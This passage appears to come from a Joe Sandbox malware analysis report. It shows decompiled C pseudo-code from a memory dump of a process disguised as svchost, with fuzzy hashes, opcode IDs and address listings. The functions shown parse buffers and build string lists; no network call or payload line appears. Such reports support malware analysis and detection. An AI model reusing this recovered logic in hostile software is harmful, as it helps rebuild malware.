                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _memset
                                                                                                                                                                                                                                                    • String ID: wwww
                                                                                                                                                                                                                                                    • API String ID: 2102423945-671953474
                                                                                                                                                                                                                                                    • Opcode ID: 56981159b78f17c5b562ff2e7d8da521ae3d0b0f004ad004817d56aaae5714f0
                                                                                                                                                                                                                                                    • Instruction ID: 7ac7e521c84300ad453423b6d132e18307e481511a592d402c42c44ac5e64213
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56981159b78f17c5b562ff2e7d8da521ae3d0b0f004ad004817d56aaae5714f0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E21B874A40208EBEB54CF94D995B9EB7B1BB48708F204588E9046F3C1D7B6AF45EBC4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                                                                                                    			E04020E40(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                                                    				signed int _t114;
                                                                                                                                                                                                                                                    				intOrPtr _t119;
                                                                                                                                                                                                                                                    				intOrPtr _t122;
                                                                                                                                                                                                                                                    				intOrPtr _t126;
                                                                                                                                                                                                                                                    				signed int _t127;
                                                                                                                                                                                                                                                    				intOrPtr _t130;
                                                                                                                                                                                                                                                    				intOrPtr _t134;
                                                                                                                                                                                                                                                    				signed int _t153;
                                                                                                                                                                                                                                                    				void* _t155;
                                                                                                                                                                                                                                                    				signed int _t156;
                                                                                                                                                                                                                                                    				signed int _t169;
                                                                                                                                                                                                                                                    				signed int _t209;
                                                                                                                                                                                                                                                    				void* _t212;
                                                                                                                                                                                                                                                    				void* _t213;
                                                                                                                                                                                                                                                    				void* _t214;
                                                                                                                                                                                                                                                    				void* _t215;
                                                                                                                                                                                                                                                    				void* _t217;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t213 = __esi;
                                                                                                                                                                                                                                                    				_t212 = __edi;
                                                                                                                                                                                                                                                    				_t156 = __ecx;
                                                                                                                                                                                                                                                    				_t155 = __ebx;
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                    					_t114 = E04021D10(_t156,  *0x42a2a8);
                                                                                                                                                                                                                                                    					_t215 = _t214 + 4;
                                                                                                                                                                                                                                                    					_v20 = _t114;
                                                                                                                                                                                                                                                    					if((_v20 & 0x0000ffff) < 1 || (_v20 & 0x0000ffff) > 0x80c) {
                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t119 = E04021D30(_t155, _t212, _t213, 0x42a2ac, _v20 & 0x0000ffff, 0x429fb0,  *0x429fac,  &_v12);
                                                                                                                                                                                                                                                    					_t215 = _t215 + 0x14;
                                                                                                                                                                                                                                                    					_v16 = _t119;
                                                                                                                                                                                                                                                    					__eflags = _v16 - 5;
                                                                                                                                                                                                                                                    					if(_v16 >= 5) {
                                                                                                                                                                                                                                                    						__eflags = _v12;
                                                                                                                                                                                                                                                    						if(_v12 != 0) {
                                                                                                                                                                                                                                                    							_t122 = E040223A0(_v12 + 4, _v16 - 4);
                                                                                                                                                                                                                                                    							_t215 = _t215 + 8;
                                                                                                                                                                                                                                                    							_v36 = _t122;
                                                                                                                                                                                                                                                    							__eflags = _v36 -  *_v12;
                                                                                                                                                                                                                                                    							if(_v36 ==  *_v12) {
                                                                                                                                                                                                                                                    								_t126 = E040070A0(_v12 + 0xc);
                                                                                                                                                                                                                                                    								_t215 = _t215 + 4;
                                                                                                                                                                                                                                                    								_v40 = _t126;
                                                                                                                                                                                                                                                    								__eflags = _v40 - 1;
                                                                                                                                                                                                                                                    								if(_v40 >= 1) {
                                                                                                                                                                                                                                                    									_v24 = _v40 + 0xd;
                                                                                                                                                                                                                                                    									__eflags = _v12 + _v24;
                                                                                                                                                                                                                                                    									_t127 = E040070A0(_v12 + _v24);
                                                                                                                                                                                                                                                    									_t215 = _t215 + 4;
                                                                                                                                                                                                                                                    									_v44 = _t127;
                                                                                                                                                                                                                                                    									_v32 = 0;
                                                                                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                                                                                    										__eflags = _v44;
                                                                                                                                                                                                                                                    										if(_v44 <= 0) {
                                                                                                                                                                                                                                                    											break;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										_v32 = _v32 + 1;
                                                                                                                                                                                                                                                    										_v24 = _v24 + _v44 + 1;
                                                                                                                                                                                                                                                    										_t153 = E040070A0(_v12 + _v24);
                                                                                                                                                                                                                                                    										_t215 = _t215 + 4;
                                                                                                                                                                                                                                                    										_v44 = _t153;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									__eflags = _v32 - 1;
                                                                                                                                                                                                                                                    									if(__eflags >= 0) {
                                                                                                                                                                                                                                                    										_push( ~(0 | __eflags > 0x00000000) | _v32 * 0x00000004);
                                                                                                                                                                                                                                                    										_t130 = E0400708A();
                                                                                                                                                                                                                                                    										_t217 = _t215 + 4;
                                                                                                                                                                                                                                                    										_v60 = _t130;
                                                                                                                                                                                                                                                    										_v28 = _v60;
                                                                                                                                                                                                                                                    										_v24 = _v40 + 0xd;
                                                                                                                                                                                                                                                    										_v48 = 0;
                                                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                                                    											__eflags = _v48 - _v32;
                                                                                                                                                                                                                                                    											if(_v48 >= _v32) {
                                                                                                                                                                                                                                                    												break;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											_v44 = E040070A0(_v12 + _v24);
                                                                                                                                                                                                                                                    											_push(_v44 + 1);
                                                                                                                                                                                                                                                    											_v64 = E0400708A();
                                                                                                                                                                                                                                                    											_v52 = _v64;
                                                                                                                                                                                                                                                    											_push(_v44);
                                                                                                                                                                                                                                                    											E04006CA0(_t155, _t212, _t213, _v52, _v12 + _v24);
                                                                                                                                                                                                                                                    											_t217 = _t217 + 0x14;
                                                                                                                                                                                                                                                    											 *((char*)(_v52 + _v44)) = 0;
                                                                                                                                                                                                                                                    											 *((intOrPtr*)(_v28 + _v48 * 4)) = _v52;
                                                                                                                                                                                                                                                    											_v24 = _v24 + _v44 + 1;
                                                                                                                                                                                                                                                    											_t209 = _v48 + 1;
                                                                                                                                                                                                                                                    											__eflags = _t209;
                                                                                                                                                                                                                                                    											_v48 = _t209;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										_v68 = E04020CE0(0x14);
                                                                                                                                                                                                                                                    										_v8 = _v68;
                                                                                                                                                                                                                                                    										_t134 = _v8;
                                                                                                                                                                                                                                                    										_t169 = _v12;
                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t134 + 0xc)) =  *((intOrPtr*)(_t169 + 4));
                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t134 + 0x10)) =  *((intOrPtr*)(_t169 + 8));
                                                                                                                                                                                                                                                    										_push(_v40 + 1);
                                                                                                                                                                                                                                                    										_v72 = E0400708A();
                                                                                                                                                                                                                                                    										 *_v8 = _v72;
                                                                                                                                                                                                                                                    										_push(_v40);
                                                                                                                                                                                                                                                    										E04006CA0(_t155, _t212, _t213,  *_v8, _v12 + 0xc);
                                                                                                                                                                                                                                                    										_t214 = _t217 + 0x14;
                                                                                                                                                                                                                                                    										 *((char*)( *_v8 + _v40)) = 0;
                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_v8 + 4)) = _v28;
                                                                                                                                                                                                                                                    										 *(_v8 + 8) = _v32;
                                                                                                                                                                                                                                                    										_t156 = 0;
                                                                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                                                                    										if(0 != 0) {
                                                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								__eflags = _v12;
                                                                                                                                                                                                                                                    								if(_v12 != 0) {
                                                                                                                                                                                                                                                    									_v56 = _v12;
                                                                                                                                                                                                                                                    									E04020CC0(_v56);
                                                                                                                                                                                                                                                    									_t215 = _t215 + 4;
                                                                                                                                                                                                                                                    									_v12 = 0x666;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L23:
                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                    						_v76 = _v12;
                                                                                                                                                                                                                                                    						E04020CC0(_v76);
                                                                                                                                                                                                                                                    						_v12 = 0x666;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L23;
                                                                                                                                                                                                                                                    			}






































                                                                                                                                                                                                                                                    0x04020e40
                                                                                                                                                                                                                                                    0x04020e40
                                                                                                                                                                                                                                                    0x04020e40
                                                                                                                                                                                                                                                    0x04020e40
                                                                                                                                                                                                                                                    0x04020e46
                                                                                                                                                                                                                                                    0x04020e4d
                                                                                                                                                                                                                                                    0x04020e54
                                                                                                                                                                                                                                                    0x04020e5a
                                                                                                                                                                                                                                                    0x04020e5f
                                                                                                                                                                                                                                                    0x04020e62
                                                                                                                                                                                                                                                    0x04020e6d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04020e9a
                                                                                                                                                                                                                                                    0x04020e9f
                                                                                                                                                                                                                                                    0x04020ea2
                                                                                                                                                                                                                                                    0x04020ea5
                                                                                                                                                                                                                                                    0x04020ea9
                                                                                                                                                                                                                                                    0x04020eab
                                                                                                                                                                                                                                                    0x04020eaf
                                                                                                                                                                                                                                                    0x04020ec4
                                                                                                                                                                                                                                                    0x04020ec9
                                                                                                                                                                                                                                                    0x04020ecc
                                                                                                                                                                                                                                                    0x04020ed5
                                                                                                                                                                                                                                                    0x04020ed7
                                                                                                                                                                                                                                                    0x04020f04
                                                                                                                                                                                                                                                    0x04020f09
                                                                                                                                                                                                                                                    0x04020f0c
                                                                                                                                                                                                                                                    0x04020f0f
                                                                                                                                                                                                                                                    0x04020f13
                                                                                                                                                                                                                                                    0x04020f20
                                                                                                                                                                                                                                                    0x04020f26
                                                                                                                                                                                                                                                    0x04020f2a
                                                                                                                                                                                                                                                    0x04020f2f
                                                                                                                                                                                                                                                    0x04020f32
                                                                                                                                                                                                                                                    0x04020f35
                                                                                                                                                                                                                                                    0x04020f3c
                                                                                                                                                                                                                                                    0x04020f3c
                                                                                                                                                                                                                                                    0x04020f40
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04020f48
                                                                                                                                                                                                                                                    0x04020f55
                                                                                                                                                                                                                                                    0x04020f5f
                                                                                                                                                                                                                                                    0x04020f64
                                                                                                                                                                                                                                                    0x04020f67
                                                                                                                                                                                                                                                    0x04020f67
                                                                                                                                                                                                                                                    0x04020f6c
                                                                                                                                                                                                                                                    0x04020f70
                                                                                                                                                                                                                                                    0x04020f8a
                                                                                                                                                                                                                                                    0x04020f8b
                                                                                                                                                                                                                                                    0x04020f90
                                                                                                                                                                                                                                                    0x04020f93
                                                                                                                                                                                                                                                    0x04020f99
                                                                                                                                                                                                                                                    0x04020fa2
                                                                                                                                                                                                                                                    0x04020fa5
                                                                                                                                                                                                                                                    0x04020fb7
                                                                                                                                                                                                                                                    0x04020fba
                                                                                                                                                                                                                                                    0x04020fbd
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04020fce
                                                                                                                                                                                                                                                    0x04020fd7
                                                                                                                                                                                                                                                    0x04020fe0
                                                                                                                                                                                                                                                    0x04020fe6
                                                                                                                                                                                                                                                    0x04020fec
                                                                                                                                                                                                                                                    0x04020ff8
                                                                                                                                                                                                                                                    0x04020ffd
                                                                                                                                                                                                                                                    0x04021006
                                                                                                                                                                                                                                                    0x04021012
                                                                                                                                                                                                                                                    0x0402101f
                                                                                                                                                                                                                                                    0x04020fb1
                                                                                                                                                                                                                                                    0x04020fb1
                                                                                                                                                                                                                                                    0x04020fb4
                                                                                                                                                                                                                                                    0x04020fb4
                                                                                                                                                                                                                                                    0x0402102e
                                                                                                                                                                                                                                                    0x04021034
                                                                                                                                                                                                                                                    0x04021037
                                                                                                                                                                                                                                                    0x0402103a
                                                                                                                                                                                                                                                    0x04021040
                                                                                                                                                                                                                                                    0x04021046
                                                                                                                                                                                                                                                    0x0402104f
                                                                                                                                                                                                                                                    0x04021058
                                                                                                                                                                                                                                                    0x04021061
                                                                                                                                                                                                                                                    0x04021066
                                                                                                                                                                                                                                                    0x04021074
                                                                                                                                                                                                                                                    0x04021079
                                                                                                                                                                                                                                                    0x04021084
                                                                                                                                                                                                                                                    0x0402108e
                                                                                                                                                                                                                                                    0x04021097
                                                                                                                                                                                                                                                    0x0402109a
                                                                                                                                                                                                                                                    0x0402109a
                                                                                                                                                                                                                                                    0x0402109c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04020f72
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04020f15
                                                                                                                                                                                                                                                    0x04020ed9
                                                                                                                                                                                                                                                    0x04020ed9
                                                                                                                                                                                                                                                    0x04020edd
                                                                                                                                                                                                                                                    0x04020ee2
                                                                                                                                                                                                                                                    0x04020ee9
                                                                                                                                                                                                                                                    0x04020eee
                                                                                                                                                                                                                                                    0x04020ef1
                                                                                                                                                                                                                                                    0x04020ef1
                                                                                                                                                                                                                                                    0x04020ef8
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04020eaf
                                                                                                                                                                                                                                                    0x040210a2
                                                                                                                                                                                                                                                    0x040210a6
                                                                                                                                                                                                                                                    0x040210ab
                                                                                                                                                                                                                                                    0x040210b2
                                                                                                                                                                                                                                                    0x040210ba
                                                                                                                                                                                                                                                    0x040210ba
                                                                                                                                                                                                                                                    0x040210c7
                                                                                                                                                                                                                                                    0x040210c7
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4218353326-0
                                                                                                                                                                                                                                                    • Opcode ID: cc552e2788ec19ea4224f0d46fe881bc41ece34d1291b5b1bd72de5b41e52a96
                                                                                                                                                                                                                                                    • Instruction ID: 6b2d4ef1dc70f01762c9ea93bfd451974196985589b21f9b2b8d381f5f98cc15
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc552e2788ec19ea4224f0d46fe881bc41ece34d1291b5b1bd72de5b41e52a96
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7791D8B4E00219DFDF44DF98D580AEEBBB1BF48318F248169E505B7381E735AA41CB56
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                                    			E04015C60(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                    				char _v5;
                                                                                                                                                                                                                                                    				intOrPtr* _v12;
                                                                                                                                                                                                                                                    				intOrPtr* _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				void _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                                                                                                    				intOrPtr _v88;
                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				void* _t107;
                                                                                                                                                                                                                                                    				intOrPtr _t115;
                                                                                                                                                                                                                                                    				signed char _t118;
                                                                                                                                                                                                                                                    				signed char _t124;
                                                                                                                                                                                                                                                    				void* _t126;
                                                                                                                                                                                                                                                    				void* _t161;
                                                                                                                                                                                                                                                    				signed int _t183;
                                                                                                                                                                                                                                                    				void* _t184;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t161 = __edx;
                                                                                                                                                                                                                                                    				_t126 = __ebx;
                                                                                                                                                                                                                                                    				_v20 =  *0x429024 ^ _t183;
                                                                                                                                                                                                                                                    				_v76 = __ecx;
                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                    				while(_a4 != 0) {
                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                    					_v5 = 1;
                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                    						_t162 = _a4;
                                                                                                                                                                                                                                                    						_v12 = E04013F50(_t126, _v76, 0x426eaa, 0x426e9c, _a4, 0, 0xffffffff, 0,  *(_v76 + 0x19) & 0x000000ff);
                                                                                                                                                                                                                                                    						if(_v12 != 0) {
                                                                                                                                                                                                                                                    							_v16 = E04015360(_t126, _v76, 0x426eaa, 0x426e9c, _v12);
                                                                                                                                                                                                                                                    							if(_v16 == 0) {
                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_v76 + 0xc)) == 0) {
                                                                                                                                                                                                                                                    									_t115 = E04020CE0(8);
                                                                                                                                                                                                                                                    									_t184 = _t184 + 4;
                                                                                                                                                                                                                                                    									_v64 = _t115;
                                                                                                                                                                                                                                                    									if(_v64 == 0) {
                                                                                                                                                                                                                                                    										_v84 = 0;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										_v84 = E0401F4E0(_v64);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_t162 = _v84;
                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_v76 + 0xc)) = _v84;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								memcpy( &_v52, 0x426e9c, 7 << 2);
                                                                                                                                                                                                                                                    								asm("movsb");
                                                                                                                                                                                                                                                    								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _t162,  &_v52, 0x1c, 0);
                                                                                                                                                                                                                                                    								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v76, 0x426c50, 2, 0);
                                                                                                                                                                                                                                                    								_t107 = E040070A0( *_v12);
                                                                                                                                                                                                                                                    								_t184 = _t184 + 0x10;
                                                                                                                                                                                                                                                    								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v12,  *_v12, _t107, 0);
                                                                                                                                                                                                                                                    								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v76, 0x426c54, 2, 0);
                                                                                                                                                                                                                                                    								E0401F9F0(_t126,  *((intOrPtr*)(_v76 + 0xc)), _v76, 0x426ebc, 4, 0);
                                                                                                                                                                                                                                                    								 *(_v76 + 0x1a) = 1;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								if( *_v16 == 0 ||  *((intOrPtr*)(_v16 + 4)) <= 0) {
                                                                                                                                                                                                                                                    									_t118 = E0401F7C0(_t126, _a4, 0x426eaa, 0x426e9c,  *((intOrPtr*)(_v12 + 0x28)),  *((intOrPtr*)(_v12 + 0x2c)));
                                                                                                                                                                                                                                                    									asm("sbb edx, edx");
                                                                                                                                                                                                                                                    									 *(_v76 + 0x1a) =  ~(_t118 & 0x000000ff) + 1;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_t124 = E0401F6B0(_t126, _a4, 0x426eaa, 0x426e9c,  *((intOrPtr*)(_v12 + 0x28)),  *((intOrPtr*)(_v12 + 0x2c)),  *_v16,  *((intOrPtr*)(_v16 + 4)));
                                                                                                                                                                                                                                                    									asm("sbb edx, edx");
                                                                                                                                                                                                                                                    									 *(_v76 + 0x1a) =  ~(_t124 & 0x000000ff) + 1;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								if(_v16 != 0) {
                                                                                                                                                                                                                                                    									_v60 = _v16;
                                                                                                                                                                                                                                                    									_v56 = _v60;
                                                                                                                                                                                                                                                    									if(_v56 == 0) {
                                                                                                                                                                                                                                                    										_v80 = 0;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										_v80 = E04004EA0(_v56, 1);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_v16 = 0x666;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							if(_v12 != 0) {
                                                                                                                                                                                                                                                    								_v72 = _v12;
                                                                                                                                                                                                                                                    								_v68 = _v72;
                                                                                                                                                                                                                                                    								if(_v68 == 0) {
                                                                                                                                                                                                                                                    									_v88 = 0;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_v88 = E04006780(_v68, 1);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v12 = 0x666;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} while (_v12 != 0 && ( *(_v76 + 0x1a) & 0x000000ff) == 0);
                                                                                                                                                                                                                                                    					asm("sbb ecx, ecx");
                                                                                                                                                                                                                                                    					_v5 =  ~( *(_v76 + 0x1a) & 0x000000ff) + 1;
                                                                                                                                                                                                                                                    					_t161 = 0;
                                                                                                                                                                                                                                                    					if(0 != 0) {
                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L30:
                                                                                                                                                                                                                                                    					return E04006C8C(_v5, _t126, _v20 ^ _t183, _t161, 0x426eaa, 0x426e9c);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L30;
                                                                                                                                                                                                                                                    			}



























                                                                                                                                                                                                                                                    0x04015c60
                                                                                                                                                                                                                                                    0x04015c60
                                                                                                                                                                                                                                                    0x04015c6d
                                                                                                                                                                                                                                                    0x04015c72
                                                                                                                                                                                                                                                    0x04015c75
                                                                                                                                                                                                                                                    0x04015c79
                                                                                                                                                                                                                                                    0x04015c84
                                                                                                                                                                                                                                                    0x04015c8b
                                                                                                                                                                                                                                                    0x04015c8f
                                                                                                                                                                                                                                                    0x04015c9d
                                                                                                                                                                                                                                                    0x04015ca9
                                                                                                                                                                                                                                                    0x04015cb0
                                                                                                                                                                                                                                                    0x04015cc2
                                                                                                                                                                                                                                                    0x04015cc9
                                                                                                                                                                                                                                                    0x04015d7c
                                                                                                                                                                                                                                                    0x04015d80
                                                                                                                                                                                                                                                    0x04015d85
                                                                                                                                                                                                                                                    0x04015d88
                                                                                                                                                                                                                                                    0x04015d8f
                                                                                                                                                                                                                                                    0x04015d9e
                                                                                                                                                                                                                                                    0x04015d91
                                                                                                                                                                                                                                                    0x04015d99
                                                                                                                                                                                                                                                    0x04015d99
                                                                                                                                                                                                                                                    0x04015da8
                                                                                                                                                                                                                                                    0x04015dab
                                                                                                                                                                                                                                                    0x04015dab
                                                                                                                                                                                                                                                    0x04015dbb
                                                                                                                                                                                                                                                    0x04015dbd
                                                                                                                                                                                                                                                    0x04015dcc
                                                                                                                                                                                                                                                    0x04015de0
                                                                                                                                                                                                                                                    0x04015ded
                                                                                                                                                                                                                                                    0x04015df2
                                                                                                                                                                                                                                                    0x04015e02
                                                                                                                                                                                                                                                    0x04015e16
                                                                                                                                                                                                                                                    0x04015e2a
                                                                                                                                                                                                                                                    0x04015e32
                                                                                                                                                                                                                                                    0x04015ccf
                                                                                                                                                                                                                                                    0x04015cd5
                                                                                                                                                                                                                                                    0x04015d26
                                                                                                                                                                                                                                                    0x04015d30
                                                                                                                                                                                                                                                    0x04015d38
                                                                                                                                                                                                                                                    0x04015ce0
                                                                                                                                                                                                                                                    0x04015cfe
                                                                                                                                                                                                                                                    0x04015d08
                                                                                                                                                                                                                                                    0x04015d10
                                                                                                                                                                                                                                                    0x04015d10
                                                                                                                                                                                                                                                    0x04015d3f
                                                                                                                                                                                                                                                    0x04015d44
                                                                                                                                                                                                                                                    0x04015d4a
                                                                                                                                                                                                                                                    0x04015d51
                                                                                                                                                                                                                                                    0x04015d62
                                                                                                                                                                                                                                                    0x04015d53
                                                                                                                                                                                                                                                    0x04015d5d
                                                                                                                                                                                                                                                    0x04015d5d
                                                                                                                                                                                                                                                    0x04015d69
                                                                                                                                                                                                                                                    0x04015d69
                                                                                                                                                                                                                                                    0x04015d70
                                                                                                                                                                                                                                                    0x04015e3a
                                                                                                                                                                                                                                                    0x04015e3f
                                                                                                                                                                                                                                                    0x04015e45
                                                                                                                                                                                                                                                    0x04015e4c
                                                                                                                                                                                                                                                    0x04015e5d
                                                                                                                                                                                                                                                    0x04015e4e
                                                                                                                                                                                                                                                    0x04015e58
                                                                                                                                                                                                                                                    0x04015e58
                                                                                                                                                                                                                                                    0x04015e64
                                                                                                                                                                                                                                                    0x04015e64
                                                                                                                                                                                                                                                    0x04015e3a
                                                                                                                                                                                                                                                    0x04015e6b
                                                                                                                                                                                                                                                    0x04015e89
                                                                                                                                                                                                                                                    0x04015e8e
                                                                                                                                                                                                                                                    0x04015e91
                                                                                                                                                                                                                                                    0x04015e93
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04015e99
                                                                                                                                                                                                                                                    0x04015eab
                                                                                                                                                                                                                                                    0x04015eab
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: codecvt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662085145-0
                                                                                                                                                                                                                                                    • Opcode ID: 02833dcf54a586269b43c7a5692cfb048f7b9c5c918048c8dbaad8ebd72bbd88
                                                                                                                                                                                                                                                    • Instruction ID: 8b2e742d592aba65153c7364a6cd7b1473e8eb5661a5a9f51c834e1a389ae5c1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02833dcf54a586269b43c7a5692cfb048f7b9c5c918048c8dbaad8ebd72bbd88
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87811A74E04218EFEB58DF94D894BADBBB2AF88318F148159E4057F3A1C775B986CB40
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                                                                                                                    			E040126B0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                    				intOrPtr* _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
